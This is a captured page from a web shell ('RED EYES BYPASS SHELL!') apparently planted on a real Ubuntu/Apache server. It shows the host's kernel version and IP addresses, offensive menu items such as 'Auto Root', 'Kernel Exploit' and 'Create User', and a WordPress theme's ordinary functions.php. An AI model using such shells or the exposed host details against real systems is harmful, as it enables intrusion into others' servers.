Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
blossom-spa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
build
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
896
B
-rwxr-xr-x
archive.php
1.26
KB
-rwxr-xr-x
comments.php
1.62
KB
-rwxr-xr-x
footer.php
1009
B
-rwxr-xr-x
front-page.php
600
B
-rwxr-xr-x
functions.php
2.3
KB
-rwxr-xr-x
header.php
1.18
KB
-rwxr-xr-x
index.php
1.37
KB
-rwxr-xr-x
page.php
933
B
-rwxr-xr-x
readme.txt
11.18
KB
-rwxr-xr-x
rtl.css
24.5
KB
-rwxr-xr-x
screenshot.png
198.97
KB
-rwxr-xr-x
search.php
1.25
KB
-rwxr-xr-x
sidebar.php
449
B
-rwxr-xr-x
single-blossom-portfolio.php
2.29
KB
-rwxr-xr-x
single.php
955
B
-rwxr-xr-x
style.css
176.46
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions.php
<?php /** * Blossom Spa functions and definitions * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package Blossom_Spa */ //define theme version $blossom_spa_theme_data = wp_get_theme(); if( ! defined( 'BLOSSOM_SPA_THEME_VERSION' ) ) define( 'BLOSSOM_SPA_THEME_VERSION', $blossom_spa_theme_data->get( 'Version' ) ); if( ! defined( 'BLOSSOM_SPA_THEME_NAME' ) ) define( 'BLOSSOM_SPA_THEME_NAME', $blossom_spa_theme_data->get( 'Name' ) ); if( ! defined( 'BLOSSOM_SPA_THEME_TEXTDOMAIN' ) ) define( 'BLOSSOM_SPA_THEME_TEXTDOMAIN', $blossom_spa_theme_data->get( 'TextDomain' ) ); /** * Custom Functions. */ require get_template_directory() . '/inc/custom-functions.php'; /** * Standalone Functions. */ require get_template_directory() . '/inc/extras.php'; /** * Template Functions. */ require get_template_directory() . '/inc/template-functions.php'; /** * Custom functions for selective refresh. */ require get_template_directory() . '/inc/partials.php'; /** * Fontawesome */ require get_template_directory() . '/inc/fontawesome.php'; /** * Custom Controls */ require get_template_directory() . '/inc/custom-controls/custom-control.php'; /** * Customizer additions. */ require get_template_directory() . '/inc/customizer/customizer.php'; /** * Widgets */ require get_template_directory() . '/inc/widgets.php'; /** * Metabox */ require get_template_directory() . '/inc/metabox.php'; /** * Dynamic Styles */ require get_template_directory() . '/css/style.php'; /** * Typography Functions */ require get_template_directory() . '/inc/typography.php'; /** * Plugin Recommendation */ require get_template_directory() . '/inc/tgmpa/recommended-plugins.php'; /** * Add theme compatibility function for woocommerce if active */ if( blossom_spa_is_woocommerce_activated() ){ require get_template_directory() . '/inc/woocommerce-functions.php'; } /** * Toolkit Filters */ if( blossom_spa_is_bttk_activated() ) { require get_template_directory() . '/inc/toolkit-functions.php'; } /** * Dashboard */ require get_template_directory() . '/inc/dashboard/dashboard.php'; /** * Implement Local Font Method functions. */ require get_template_directory() . '/inc/class-webfont-loader.php';
Close